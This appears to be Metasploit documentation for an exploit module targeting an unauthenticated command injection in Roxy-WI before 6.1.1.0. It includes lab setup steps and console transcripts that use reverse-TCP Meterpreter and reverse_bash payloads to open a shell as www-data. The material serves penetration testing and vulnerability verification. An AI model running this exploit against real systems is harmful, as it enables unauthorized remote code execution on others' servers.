adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
72b1dbfeee3a7aa69916b427eeed6f73a85f4a9a
metasploit-gs/documentation/modules/exploit/linux/http/roxy_wi_exec.md
T

3.4 KiB
Raw Blame History

Vulnerable Application

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user.

Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

Setup

Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.

https://roxy-wi.org/installation.py#manual

git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py 
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/roxy_wi_exec
  4. Set RHOST to the address of the target Roxy-WI machine.
  5. Set LHOST to the address of your attacking machine.
  6. Run exploit
  7. Do: run
  8. You should get a shell as the user running the Roxy-WI server.

Targets

0

This executes a Unix command.

1

This uses a Linux dropper to execute code.

Options

TARGETURI

The base path to Roxy-WI. The default value is /.

Scenarios

Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Python Meterpreter Payload

msf6 > use exploit/linux/http/roxy_wi_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300

meterpreter >

Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux CMD Payload

msf6 > use exploit/linux/http/roxy_wi_exec 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.56.116:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.116:37396) at 2022-07-21 13:50:23 +0300
[+] Exploit successfully executed.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)```
Reference in New Issue View Git Blame Copy Permalink